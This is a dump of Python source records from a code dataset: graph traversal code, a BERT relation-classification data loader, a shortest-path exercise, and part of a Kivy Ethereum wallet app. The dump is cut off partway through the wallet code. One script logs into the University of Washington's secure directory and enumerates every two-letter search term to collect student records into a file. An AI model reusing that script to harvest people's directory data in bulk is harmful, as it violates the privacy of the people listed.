except KeyError:\n raise KeyError(str(start) + ' not in graph')\n return res\n\n def breadth_first_traversal(self, start):\n \"\"\"Breadth version of graph traversal.\"\"\"\n try:\n res = []\n queue = Queue([start])\n track = set()\n while queue.head:\n cur_node = queue.dequeue()\n if cur_node not in track:\n res.append(cur_node)\n track.add(cur_node)\n for child in self.node_dict[cur_node]:\n queue.enqueue(child)\n except KeyError:\n raise KeyError(str(start) + ' not in graph')\n return res\n\n def depth_first_traversal_iterative(self, start):\n \"\"\"Breadth version of graph traversal.\"\"\"\n try:\n res = []\n stack = Stack([start])\n track = set()\n while stack.top:\n cur_node = stack.pop()\n if cur_node not in track:\n res.append(cur_node)\n track.add(cur_node)\n for child in self.node_dict[cur_node][::-1]:\n stack.push(child)\n except KeyError:\n raise KeyError(str(start) + ' not in graph')\n return res\n\n\nif __name__ == '__main__': # pragma: no cover\n import timeit\n import random\n from pprint import pprint\n\n graph = Graph()\n for i in range(100):\n try:\n graph.add_edge(random.randint(0, 20), random.randint(0, 20))\n except:\n pass\n start = graph.nodes()[random.randint(0, len(graph.nodes()))]\n\n pprint(graph.node_dict)\n\n depth = timeit.timeit(\n stmt=\"graph.depth_first_traversal(start)\",\n setup=\"from __main__ import graph, start\",\n number=1000,\n )\n depth_i = timeit.timeit(\n stmt=\"graph.depth_first_traversal_iterative(start)\",\n setup=\"from __main__ import graph, start\",\n number=1000,\n )\n breadth = timeit.timeit(\n stmt=\"graph.breadth_first_traversal(start)\",\n setup=\"from __main__ import graph, start\",\n number=1000,\n )\n print('\\n1000 recursive depth first traversals:\\n\\t{} seconds\\n'.format(depth) +\n '\\tPath: {}\\n'.format(graph.depth_first_traversal(start)) +\n '\\n1000 iterative depth first traversals:\\n\\t{} seconds\\n'.format(depth_i) +\n '\\tPath: {}\\n'.format(graph.depth_first_traversal_iterative(start)) +\n '\\n1000 breadth first traversals:\\n\\t{} seconds\\n'.format(breadth) +\n '\\tPath: {}\\n'.format(graph.breadth_first_traversal(start)))\n","sub_path":"src/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245594324","text":"import numpy as np\nimport pandas as pd\nimport re\nfrom transformers import BertTokenizer, BertModel\nfrom config import config\n\npretrained_weights = config.pretrained_weights\ntokenizer = BertTokenizer.from_pretrained(pretrained_weights)\nspecial_tokens_dict = {'additional_special_tokens': [\"$\", \"#\"]}\nprint(tokenizer.SPECIAL_TOKENS_ATTRIBUTES)\n# 添加特殊Token, 使模型不会拆分, 用作标记使用\ntokenizer.add_special_tokens(special_tokens_dict)\nprint(tokenizer.additional_special_tokens)\nprint(tokenizer.additional_special_tokens_ids)\nprint(tokenizer.sep_token)\nprint(tokenizer.sep_token_id)\nprint(tokenizer.cls_token_id)\nprint(tokenizer.cls_token)\nprint(tokenizer.pad_token_id)\nprint(tokenizer.mask_token) # [MASK]\nprint(tokenizer.mask_token_id) # 103\n\n\n# 文字关系:标签 19;\nclass2label = {'Other': 0,\n 'Message-Topic(e1,e2)': 1, 'Message-Topic(e2,e1)': 2,\n 'Product-Producer(e1,e2)': 3, 'Product-Producer(e2,e1)': 4,\n 'Instrument-Agency(e1,e2)': 5, 'Instrument-Agency(e2,e1)': 6,\n 'Entity-Destination(e1,e2)': 7, 'Entity-Destination(e2,e1)': 8,\n 'Cause-Effect(e1,e2)': 9, 'Cause-Effect(e2,e1)': 10,\n 'Component-Whole(e1,e2)': 11, 'Component-Whole(e2,e1)': 12,\n 'Entity-Origin(e1,e2)': 13, 'Entity-Origin(e2,e1)': 14,\n 'Member-Collection(e1,e2)': 15, 'Member-Collection(e2,e1)': 16,\n 'Content-Container(e1,e2)': 17, 'Content-Container(e2,e1)': 18}\n\n# 标签: 文字关系\nlabel2class = {0: 'Other',\n 1: 'Message-Topic(e1,e2)', 2: 'Message-Topic(e2,e1)',\n 3: 'Product-Producer(e1,e2)', 4: 'Product-Producer(e2,e1)',\n 5: 'Instrument-Agency(e1,e2)', 6: 'Instrument-Agency(e2,e1)',\n 7: 'Entity-Destination(e1,e2)', 8: 'Entity-Destination(e2,e1)',\n 9: 'Cause-Effect(e1,e2)', 10: 'Cause-Effect(e2,e1)',\n 11: 'Component-Whole(e1,e2)', 12: 'Component-Whole(e2,e1)',\n 13: 'Entity-Origin(e1,e2)', 14: 'Entity-Origin(e2,e1)',\n 15: 'Member-Collection(e1,e2)', 16: 'Member-Collection(e2,e1)',\n 17: 'Content-Container(e1,e2)', 18: 'Content-Container(e2,e1)'}\n\n\ndef clean_str(text):\n text = text.lower()\n # Clean the text\n text = re.sub(r\"[^A-Za-z0-9^,!.\\/'+-=$#]\", \" \", text)\n text = re.sub(r\"what's\", \"what is \", text)\n text = re.sub(r\"that's\", \"that is \", text)\n text = re.sub(r\"there's\", \"there is \", text)\n text = re.sub(r\"it's\", \"it is \", text)\n text = re.sub(r\"\\'s\", \" \", text)\n text = re.sub(r\"\\'ve\", \" have \", text)\n text = re.sub(r\"can't\", \"can not \", text)\n text = re.sub(r\"n't\", \" not \", text)\n text = re.sub(r\"i'm\", \"i am \", text)\n text = re.sub(r\"\\'re\", \" are \", text)\n text = re.sub(r\"\\'d\", \" would \", text)\n text = re.sub(r\"\\'ll\", \" will \", text)\n text = re.sub(r\",\", \" \", text)\n text = re.sub(r\"\\.\", \" \", text)\n text = re.sub(r\"!\", \" ! \", text)\n text = re.sub(r\"\\/\", \" \", text)\n text = re.sub(r\"\\^\", \" ^ \", text)\n text = re.sub(r\"\\+\", \" + \", text)\n text = re.sub(r\"\\-\", \" - \", text)\n text = re.sub(r\"\\=\", \" = \", text)\n text = re.sub(r\"'\", \" \", text)\n text = re.sub(r\"(\\d+)(k)\", r\"\\g<1>000\", text)\n text = re.sub(r\":\", \" : \", text)\n text = re.sub(r\" e g \", \" eg \", text)\n text = re.sub(r\" b g \", \" bg \", text)\n text = re.sub(r\" u s \", \" american \", text)\n text = re.sub(r\"\\0s\", \"0\", text) # ?\n text = re.sub(r\" 9 11 \", \"911\", text)\n text = re.sub(r\"e - mail\", \"email\", text)\n text = re.sub(r\"j k\", \"jk\", text)\n text = re.sub(r\"\\s{2,}\", \" \", text) # ?\n\n return text.strip()\n\n\ndef load_data_and_labels(path):\n data = []\n lines = [line.strip() for line in open(path)]\n max_sentence_length = 0\n labels = [] # 标签\n for idx in range(0, len(lines), 4): # 处理每条句子\n id = lines[idx].split(\"\\t\")[0]\n relation = lines[idx + 1]\n\n sentence = lines[idx].split(\"\\t\")[1][1:-1]\n # 清除 原有的 # $, 特殊符号 不认为影响 句子意思\n sentence = sentence.replace('#', '')\n sentence = sentence.replace('$', '')\n\n sentence = sentence.replace('', ' $ ')\n sentence = sentence.replace('', ' $ ')\n sentence = sentence.replace('', ' # ')\n sentence = sentence.replace('', ' # ')\n\n sentence = clean_str(sentence) # 对句子清洗一遍\n sentence = \"[CLS] \" + sentence + \" [SEP]\" # 在句子开始 加入[CLS] or CLS ? [CLS]:101; CLS:101\n\n tokens = tokenizer.tokenize(sentence)\n if max_sentence_length < len(tokens):\n max_sentence_length = len(tokens)\n\n data.append([id, sentence, relation])\n\n df = pd.DataFrame(data=data, columns=[\"id\", \"sentence\", \"relation\"])\n df['label'] = [class2label[r] for r in df['relation']]\n x_text = df['sentence'].tolist()\n y = df['label'].tolist()\n\n x_text = np.array(x_text)\n y = np.array(y)\n\n return x_text, y, max_sentence_length # 数据(句子),标签\n\n\nif __name__ == \"__main__\":\n pass","sub_path":"mul_bert/bertRC_mALL_data_helps.py","file_name":"bertRC_mALL_data_helps.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559290297","text":"from urllib import request, parse\nfrom hiddenFieldParser import HiddenFieldParser\nimport searchParser\nimport http.cookiejar\nimport http.client\nimport string\nimport weblogin\nimport searchParser\nimport os\n\nheaders = {\n 'accept': \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n 'upgrade-insecure-requests': \"1\",\n 'user-agent': \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\",\n 'content-type': \"application/x-www-form-urlencoded\",\n 'accept-language': \"en-US,en;q=0.8,sl;q=0.6\",\n 'cache-control': \"no-cache\",\n}\n\nurl = \"https://www.washington.edu/home/peopledir/secure/\"\n\npubcookie_l = weblogin.requestPubCookieL()\npubcookie_g = weblogin.requestPubCookieG(url)\n\n# Add our pubcookie_l.\nheaders['cookie'] = pubcookie_l[0] + \"=\" + pubcookie_l[1]\n# Add our pubcookie_g.\nheaders['cookie'] += \"; \" + pubcookie_g[0] + \"=\" + pubcookie_g[1]\n\n# Prepare our body data.\nbody = {\n \"length\": \"sum\",\n \"method\": \"name\",\n \"whichdir\": \"student\"\n}\n\n# Returns True if the request was successful...\n# whatever that means.\ndef doSearch(parser, url, body, headers):\n body = parse.urlencode(body).encode(\"ascii\")\n req = request.Request(url, body, headers)\n response = request.urlopen(req)\n page = response.read().decode(\"utf-8\")\n parser.feed(page)\n if len(parser.data) != 0 or \"No matches for\" in page:\n return True\n else:\n return False\n\nf = open(\"students.txt\", \"w\")\nparser = searchParser.SearchParser()\nstudents = []\n# Iterate through every two-character string.\nfor i in string.ascii_lowercase:\n for j in string.ascii_lowercase:\n print(i + j)\n body['term'] = i + j\n # While the request is unsuccessful.\n while not doSearch(parser, url, body, headers):\n pubcookie_g = weblogin.requestPubCookieG(url)\n # Set our pubcookie_l.\n headers['cookie'] = pubcookie_l[0] + \"=\" + pubcookie_l[1]\n # Add our new pubcookie_g.\n headers['cookie'] += \"; \" + pubcookie_g[0] + \"=\" + pubcookie_g[1]\n\n for entry in parser.data:\n students.append(entry)\n parser = searchParser.SearchParser()\n\n# Remove duplicates.\nstudents = set(tuple(x) for x in students) \n\n# Sort by name.\nstudents = sorted(students, key = lambda student: student[0])\n\nfor entry in students:\n f.write(str(entry) + \"\\n\")\nf.close()\n","sub_path":"uwDirectory.py","file_name":"uwDirectory.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"541907438","text":"INF = int(1e9)\n\nn, m = map(int, input().split())\n\n# 2차원 리스트를 만들고, 모든 값을 무한으로 초기화\ngraph = [[INF] * (n + 1) for _ in range(n + 1)]\n\n# 자기 자신에서 자기 자신으로 가는 비용은 0으로 초기화\nfor a in range(1, n + 1):\n for b in range(1, n + 1):\n if a == b:\n graph[a][b] = 0\n\n# 각 간선에 대한 정보를 입력받아, 그 값으로 초기화\nfor _ in range(m):\n # A에서 B로 가는 비용은 C라고 설정\n a, b = map(int, input().split())\n graph[a][b] = 1\n graph[b][a] = 1\n\nx, k = map(int, input().split())\n\n# 입력\n# 5 7\n# 1 2\n# 1 3\n# 1 4\n# 2 4\n# 3 4\n# 3 5\n# 4 5\n# 4 5\n\n# 점화식에 따라 프로이드 워셜 알고리즘을 수행\nfor k in range(1, n + 1):\n for a in range(1, n + 1):\n for b in range(1, n + 1):\n graph[a][b] = min(graph[a][b], graph[a][k] + graph[k][b])\n\ndistance = graph[1][k] + graph[k][x]\nprint(graph)\n\nif distance >= INF:\n print(-1)\nelse:\n print(distance)\n# 수행된 결과를 출력\n# for a in range(1, n + 1):\n# for b in range(1, n + 1):\n# # 도달할 수 없는 경우, 무한(INFINITY)이라고 출력\n# if graph[a][b] == INF:\n# print(\"INFINITY\", end = \" \")\n# # 도달할 수 없는 경우 거리를 출력\n# else:\n# print(graph[a][b], end=\" \")\n# print()\n","sub_path":"이것이 코딩 테스트다 - 연습문제/26. 미래 도시.py","file_name":"26. 미래 도시.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"8534958","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function, unicode_literals\n\nimport os\nimport re\nimport threading\nimport unittest\nfrom io import StringIO\n\nimport kivy\nfrom ethereum.utils import normalize_address\nfrom kivy.app import App\nfrom kivy.clock import Clock, mainthread\nfrom kivy.core.clipboard import Clipboard\nfrom kivy.core.window import Window\nfrom kivy.logger import LOG_LEVELS, Logger\nfrom kivy.metrics import dp\nfrom kivy.properties import (DictProperty, NumericProperty, ObjectProperty,\n StringProperty)\nfrom kivy.storage.jsonstore import JsonStore\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.utils import get_color_from_hex, platform\nfrom kivymd.bottomsheet import MDListBottomSheet\nfrom kivymd.button import MDFlatButton, MDIconButton\nfrom kivymd.color_definitions import colors\nfrom kivymd.dialog import MDDialog\nfrom kivymd.label import MDLabel\nfrom kivymd.list import (ILeftBodyTouch, OneLineListItem, TwoLineIconListItem,\n TwoLineListItem)\nfrom kivymd.navigationdrawer import NavigationDrawerHeaderBase\nfrom kivymd.selectioncontrols import MDSwitch\nfrom kivymd.snackbar import Snackbar\nfrom kivymd.textfields import MDTextField\nfrom kivymd.theming import ThemeManager\nfrom kivymd.toolbar import Toolbar\nfrom PIL import Image as PILImage\nfrom raven import Client\nfrom raven.conf import setup_logging\nfrom raven.handlers.logging import SentryHandler\nfrom requests.exceptions import ConnectionError\n\nfrom pywalib import (ROUND_DIGITS, InsufficientFundsException,\n NoTransactionFoundException, PyWalib,\n UnknownEtherscanException)\nfrom testsuite import suite\nfrom version import __version__\n\n# monkey patching PIL, until it gets monkey patched upstream, refs:\n# https://github.com/kivy/kivy/issues/5460\n# and refs:\n# https://github.com/AndreMiras/PyWallet/issues/104\ntry:\n # Pillow\n PILImage.frombytes\n PILImage.Image.tobytes\nexcept AttributeError:\n # PIL\n PILImage.frombytes = PILImage.frombuffer\n PILImage.Image.tobytes = PILImage.Image.tostring\n\nkivy.require('1.10.0')\n\n# Time before loading the next screen.\n# The idea is to let the application render before trying to add child widget,\n# refs #122.\nSCREEN_SWITCH_DELAY = 0.4\n\n\ndef run_in_thread(fn):\n \"\"\"\n Decorator to run a function in a thread.\n >>> 1 + 1\n 2\n >>> @run_in_thread\n ... def threaded_sleep(seconds):\n ... from time import sleep\n ... sleep(seconds)\n >>> thread = threaded_sleep(0.1)\n >>> type(thread)\n \n >>> thread.is_alive()\n True\n >>> thread.join()\n >>> thread.is_alive()\n False\n \"\"\"\n def run(*k, **kw):\n t = threading.Thread(target=fn, args=k, kwargs=kw)\n t.start()\n return t\n return run\n\n\nclass NavigationDrawerTwoLineListItem(\n TwoLineListItem, NavigationDrawerHeaderBase):\n\n address_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(NavigationDrawerTwoLineListItem, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n \"\"\"\n Binds Controller.current_account property.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.controller.bind(\n current_account=lambda _, value: self.on_current_account(value))\n\n def on_current_account(self, account):\n # e.g. deleting the last account, would set\n # Controller.current_account to None\n if account is None:\n return\n address = \"0x\" + account.address.encode(\"hex\")\n self.address_property = address\n\n def _update_specific_text_color(self, instance, value):\n pass\n\n def _set_active(self, active, list):\n pass\n\n\nclass CustomMDSwitch(MDSwitch):\n \"\"\"\n Work around for a MDSwitch bug, refs:\n https://gitlab.com/kivymd/KivyMD/issues/99\n \"\"\"\n\n def _set_colors(self, *args):\n \"\"\"\n Overrides `MDSwitch._set_colors()` fixes missing attribute\n `thumb_color_disabled`, refs:\n https://gitlab.com/kivymd/KivyMD/issues/99\n \"\"\"\n super(CustomMDSwitch, self)._set_colors(*args)\n self.thumb_color_disabled = get_color_from_hex(colors['Grey']['800'])\n\n\nclass IconLeftWidget(ILeftBodyTouch, MDIconButton):\n pass\n\n\nclass FloatInput(MDTextField):\n \"\"\"\n Accepts float numbers only.\n \"\"\"\n\n pat = re.compile('[^0-9]')\n\n def insert_text(self, substring, from_undo=False):\n pat = self.pat\n if '.' in self.text:\n s = re.sub(pat, '', substring)\n else:\n s = '.'.join([re.sub(pat, '', s) for s in substring.split('.', 1)])\n return super(FloatInput, self).insert_text(s, from_undo=from_undo)\n\n\nclass PasswordForm(BoxLayout):\n\n password = StringProperty()\n\n\nclass AliasForm(BoxLayout):\n\n alias = StringProperty()\n address = StringProperty()\n\n def __init__(self, account, **kwargs):\n \"\"\"\n Setups the current alias for the given account.\n \"\"\"\n super(AliasForm, self).__init__(**kwargs)\n self.address = \"0x\" + account.address.encode(\"hex\")\n try:\n self.alias = Controller.get_address_alias(self.address)\n except KeyError:\n self.alias = ''\n\n\nclass Send(BoxLayout):\n\n password = StringProperty(\"\")\n send_to_address = StringProperty(\"\")\n send_amount = NumericProperty(0)\n\n def __init__(self, **kwargs):\n super(Send, self).__init__(**kwargs)\n\n def verify_to_address_field(self):\n title = \"Input error\"\n body = \"Invalid address field\"\n try:\n normalize_address(self.send_to_address)\n except Exception:\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n return False\n return True\n\n def verify_amount_field(self):\n title = \"Input error\"\n body = \"Invalid amount field\"\n if self.send_amount == 0:\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n return False\n return True\n\n def verify_fields(self):\n \"\"\"\n Verifies address and amount fields are valid.\n \"\"\"\n return self.verify_to_address_field() \\\n and self.verify_amount_field()\n\n def on_unlock_clicked(self, dialog, password):\n self.password = password\n dialog.dismiss()\n\n def prompt_password_dialog(self):\n \"\"\"\n Prompt the password dialog.\n \"\"\"\n title = \"Enter your password\"\n content = PasswordForm()\n dialog = MDDialog(\n title=title,\n content=content,\n size_hint=(.8, None),\n height=dp(250),\n auto_dismiss=False)\n # workaround for MDDialog container size (too small by default)\n dialog.ids.container.size_hint_y = 1\n dialog.add_action_button(\n \"Unlock\",\n action=lambda *x: self.on_unlock_clicked(\n dialog, content.password))\n return dialog\n\n def on_send_click(self):\n if not self.verify_fields():\n Controller.show_invalid_form_dialog()\n return\n dialog = self.prompt_password_dialog()\n dialog.open()\n\n @run_in_thread\n def unlock_send_transaction(self):\n \"\"\"\n Unlocks the account with password in order to sign and publish the\n transaction.\n \"\"\"\n controller = App.get_running_app().controller\n pywalib = controller.pywalib\n address = normalize_address(self.send_to_address)\n amount_eth = round(self.send_amount, ROUND_DIGITS)\n amount_wei = int(amount_eth * pow(10, 18))\n account = controller.pywalib.get_main_account()\n Controller.snackbar_message(\"Unlocking account...\")\n try:\n account.unlock(self.password)\n except ValueError:\n Controller.snackbar_message(\"Could not unlock account\")\n return\n\n Controller.snackbar_message(\"Unlocked! Sending transaction...\")\n sender = account.address\n try:\n pywalib.transact(address, value=amount_wei, data='', sender=sender)\n except InsufficientFundsException:\n Controller.snackbar_message(\"Insufficient funds\")\n return\n except UnknownEtherscanException:\n Controller.snackbar_message(\"Unknown error\")\n Logger.error('UnknownEtherscanException', exc_info=True)\n return\n # TODO: handle ConnectionError\n Controller.snackbar_message(\"Sent!\")\n\n def on_password(self, instance, password):\n self.unlock_send_transaction()\n\n\nclass Receive(BoxLayout):\n\n current_account = ObjectProperty(allownone=True)\n address_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(Receive, self).__init__(**kwargs)\n # for some reason setting the timeout to zero\n # crashes with:\n # 'super' object has no attribute '__getattr__'\n # only on first account creation (with auto redirect)\n # and we cannot yet reproduce in unit tests\n timeout = 1\n Clock.schedule_once(lambda dt: self.setup(), timeout)\n\n def setup(self):\n \"\"\"\n Binds Controller current_account and on_alias_updated.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.controller.bind(current_account=self.setter('current_account'))\n self.controller.bind(on_alias_updated=self.on_alias_updated)\n # triggers the update\n self.current_account = self.controller.current_account\n\n def show_address(self, address):\n self.ids.qr_code_id.data = address\n\n def update_address_property(self):\n \"\"\"\n Updates address_property from current_account.\n \"\"\"\n account = self.current_account\n address = \"0x\" + account.address.encode(\"hex\")\n self.address_property = address\n\n def on_current_account(self, instance, account):\n if account is None:\n return\n self.update_address_property()\n\n def on_address_property(self, instance, value):\n self.show_address(value)\n\n def on_alias_updated(self, instance, alias):\n \"\"\"\n Forces account string update, which will triggers an\n AddressButton.on_address_property event.\n \"\"\"\n self.address_property = \"\"\n self.update_address_property()\n\n\nclass History(BoxLayout):\n\n current_account = ObjectProperty(allownone=True)\n\n def __init__(self, **kwargs):\n super(History, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n \"\"\"\n Binds Controller.current_account property.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.controller.bind(current_account=self.setter('current_account'))\n # triggers the update\n self.current_account = self.controller.current_account\n self.controller.bind(accounts_history=self.update_history_list)\n\n def on_current_account(self, instance, account):\n \"\"\"\n Updates with last known (cached values) and update the cache.\n \"\"\"\n self.update_history_list()\n self.fetch_history()\n\n @staticmethod\n def create_item(sent, amount, from_to):\n \"\"\"\n Creates a history list item from parameters.\n \"\"\"\n send_receive = \"Sent\" if sent else \"Received\"\n text = \"%s %sETH\" % (send_receive, amount)\n secondary_text = from_to\n icon = \"arrow-up-bold\" if sent else \"arrow-down-bold\"\n list_item = TwoLineIconListItem(\n text=text, secondary_text=secondary_text)\n icon_widget = IconLeftWidget(icon=icon)\n list_item.add_widget(icon_widget)\n return list_item\n\n @classmethod\n def create_item_from_dict(cls, transaction_dict):\n \"\"\"\n Creates a history list item from a transaction dictionary.\n \"\"\"\n extra_dict = transaction_dict['extra_dict']\n sent = extra_dict['sent']\n amount = extra_dict['value_eth']\n from_address = extra_dict['from_address']\n to_address = extra_dict['to_address']\n from_to = to_address if sent else from_address\n list_item = cls.create_item(sent, amount, from_to)\n return list_item\n\n @mainthread\n def update_history_list(self, instance=None, value=None):\n \"\"\"\n Updates the history list widget from last known (cached) values.\n \"\"\"\n if self.current_account is None:\n return\n address = '0x' + self.current_account.address.encode(\"hex\")\n try:\n transactions = self.controller.accounts_history[address]\n except KeyError:\n transactions = []\n # new transactions first, but do not change the list using reverse()\n transactions = transactions[::-1]\n history_list_id = self.ids.history_list_id\n history_list_id.clear_widgets()\n for transaction in transactions:\n list_item = History.create_item_from_dict(transaction)\n history_list_id.add_widget(list_item)\n\n @run_in_thread\n def fetch_history(self):\n if self.current_account is None:\n return\n address = '0x' + self.current_account.address.encode(\"hex\")\n try:\n transactions = PyWalib.get_transaction_history(address)\n except ConnectionError:\n Controller.on_history_connection_error()\n Logger.warning('ConnectionError', exc_info=True)\n return\n except NoTransactionFoundException:\n transactions = []\n except ValueError:\n # most likely the JSON object could not be decoded, refs #91\n Controller.on_history_value_error()\n # currently logged as an error, because we want more insight\n # in order to eventually handle it more specifically\n Logger.error('ValueError', exc_info=True)\n return\n # triggers accounts_history observers update\n self.controller.accounts_history[address] = transactions\n\n\nclass SwitchAccount(BoxLayout):\n\n def on_release(self, list_item):\n \"\"\"\n Sets Controller.current_account and switches to previous screen.\n \"\"\"\n # sets Controller.current_account\n self.selected_list_item = list_item\n self.controller.current_account = list_item.account\n # switches to previous screen\n self.controller.screen_manager_previous()\n\n def create_item(self, account):\n \"\"\"\n Creates an account list item from given account.\n \"\"\"\n address = \"0x\" + account.address.encode(\"hex\")\n # gets the alias if exists\n try:\n text = Controller.get_address_alias(address)\n except KeyError:\n text = address\n list_item = OneLineListItem(text=text)\n # makes sure the address doesn't overlap on small screen\n list_item.ids._lbl_primary.shorten = True\n list_item.account = account\n list_item.bind(on_release=lambda x: self.on_release(x))\n return list_item\n\n def load_account_list(self):\n \"\"\"\n Fills account list widget from library account list.\n \"\"\"\n self.controller = App.get_running_app().controller\n account_list_id = self.ids.account_list_id\n account_list_id.clear_widgets()\n accounts = self.controller.pywalib.get_account_list()\n for account in accounts:\n list_item = self.create_item(account)\n account_list_id.add_widget(list_item)\n\n\nclass Overview(BoxLayout):\n\n current_account = ObjectProperty(allownone=True)\n current_account_string = StringProperty()\n\n def __init__(self, **kwargs):\n super(Overview, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n \"\"\"\n Binds Controller current_account and on_alias_updated.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.controller.bind(current_account=self.setter('current_account'))\n self.controller.bind(on_alias_updated=self.on_alias_updated)\n # triggers the update\n self.current_account = self.controller.current_account\n\n def update_current_account_string(self):\n \"\"\"\n Updates current_account_string from current_account.\n \"\"\"\n if self.current_account is None:\n return\n account = self.current_account\n address = \"0x\" + account.address.encode(\"hex\")\n self.current_account_string = address\n\n def on_current_account(self, instance, account):\n \"\"\"\n Updates current_account_string and fetches the new account balance.\n \"\"\"\n self.update_current_account_string()\n self.controller.fetch_balance()\n\n def on_alias_updated(self, instance, alias):\n \"\"\"\n Forces account string update, which will triggers an\n AddressButton.on_address_property event.\n \"\"\"\n self.current_account_string = \"\"\n self.update_current_account_string()\n\n\nclass PWSelectList(BoxLayout):\n\n selected_item = ObjectProperty()\n\n def __init__(self, **kwargs):\n self._items = kwargs.pop('items')\n super(PWSelectList, self).__init__(**kwargs)\n self._setup()\n\n def on_release(self, item):\n self.selected_item = item\n\n def _setup(self):\n address_list = self.ids.address_list_id\n for item in self._items:\n item.bind(on_release=lambda x: self.on_release(x))\n address_list.add_widget(item)\n\n\nclass ImportKeystore(BoxLayout):\n\n keystore_path = StringProperty()\n\n def __init__(self, **kwargs):\n super(ImportKeystore, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n self.controller = App.get_running_app().controller\n self.keystore_path = self.controller.get_keystore_path()\n accounts = self.controller.pywalib.get_account_list()\n if len(accounts) == 0:\n title = \"No keystore found.\"\n body = \"Import or create one.\"\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n\n\n# TODO: also make it possible to update PBKDF2\n# TODO: create a generic password form\n# TODO: create a generic account form\nclass ManageExisting(BoxLayout):\n\n # e.g. when the last account was deleted\n current_account = ObjectProperty(allownone=True)\n address_property = StringProperty()\n current_password = StringProperty()\n new_password1 = StringProperty()\n new_password2 = StringProperty()\n\n def __init__(self, **kwargs):\n super(ManageExisting, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n \"\"\"\n Binds Controller.current_account property.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.pywalib = self.controller.pywalib\n self.controller.bind(current_account=self.setter('current_account'))\n # triggers the update\n self.current_account = self.controller.current_account\n\n def verify_current_password_field(self):\n \"\"\"\n Makes sure passwords are matching.\n \"\"\"\n account = self.current_account\n password = self.current_password\n # making sure it's locked first\n account.lock()\n try:\n account.unlock(password)\n except ValueError:\n return False\n return True\n\n def verify_password_field(self):\n \"\"\"\n Makes sure passwords are matching and are not void.\n \"\"\"\n passwords_matching = self.new_password1 == self.new_password2\n passwords_not_void = self.new_password1 != ''\n return passwords_matching and passwords_not_void\n\n def verify_fields(self):\n \"\"\"\n Verifies password fields are valid.\n \"\"\"\n return self.verify_password_field()\n\n def show_redirect_dialog(self):\n title = \"Account deleted, redirecting...\"\n body = \"\"\n body += \"Your account was deleted, \"\n body += \"you will be redirected to the overview.\"\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n\n def on_delete_account_yes(self, dialog):\n \"\"\"\n Deletes the account, discarts the warning dialog,\n shows an info popup and redirects to the landing page.\n \"\"\"\n account = self.current_account\n self.pywalib.delete_account(account)\n dialog.dismiss()\n self.controller.current_account = None\n self.show_redirect_dialog()\n self.controller.load_landing_page()\n\n def prompt_no_account_error(self):\n \"\"\"\n Prompts an error since no account are selected for deletion, refs:\n https://github.com/AndreMiras/PyWallet/issues/90\n \"\"\"\n title = \"No account selected.\"\n body = \"No account selected for deletion.\"\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n\n def prompt_delete_account_dialog(self):\n \"\"\"\n Prompt a confirmation dialog before deleting the account.\n \"\"\"\n if self.current_account is None:\n self.prompt_no_account_error()\n return\n title = \"Are you sure?\"\n body = \"\"\n body += \"This action cannot be undone.\\n\"\n body += \"Are you sure you want to delete this account?\\n\"\n dialog = Controller.create_dialog_helper(title, body)\n dialog.add_action_button(\n \"No\",\n action=lambda *x: dialog.dismiss())\n dialog.add_action_button(\n \"Yes\",\n action=lambda *x: self.on_delete_account_yes(dialog))\n dialog.open()\n\n @run_in_thread\n def update_password(self):\n \"\"\"\n Update account password with new password provided.\n \"\"\"\n if not self.verify_fields():\n Controller.show_invalid_form_dialog()\n return\n Controller.snackbar_message(\"Verifying current password...\")\n if not self.verify_current_password_field():\n Controller.snackbar_message(\"Wrong account password\")\n return\n pywalib = self.controller.pywalib\n account = self.current_account\n new_password = self.new_password1\n Controller.snackbar_message(\"Updating account...\")\n pywalib.update_account_password(account, new_password=new_password)\n Controller.snackbar_message(\"Updated!\")\n\n def on_current_account(self, instance, account):\n # e.g. deleting the last account, would set\n # Controller.current_account to None\n if account is None:\n return\n address = \"0x\" + account.address.encode(\"hex\")\n self.address_property = address\n\n\nclass CreateNewAccount(BoxLayout):\n \"\"\"\n PBKDF2 iterations choice is a security vs speed trade off:\n https://security.stackexchange.com/q/3959\n \"\"\"\n\n alias = StringProperty()\n new_password1 = StringProperty()\n new_password2 = StringProperty()\n\n def __init__(self, **kwargs):\n super(CreateNewAccount, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n \"\"\"\n Sets security vs speed default values.\n Plus hides the advanced widgets.\n \"\"\"\n self.security_slider = self.ids.security_slider_id\n self.speed_slider = self.ids.speed_slider_id\n self.security_slider.value = self.speed_slider.value = 50\n self.controller = 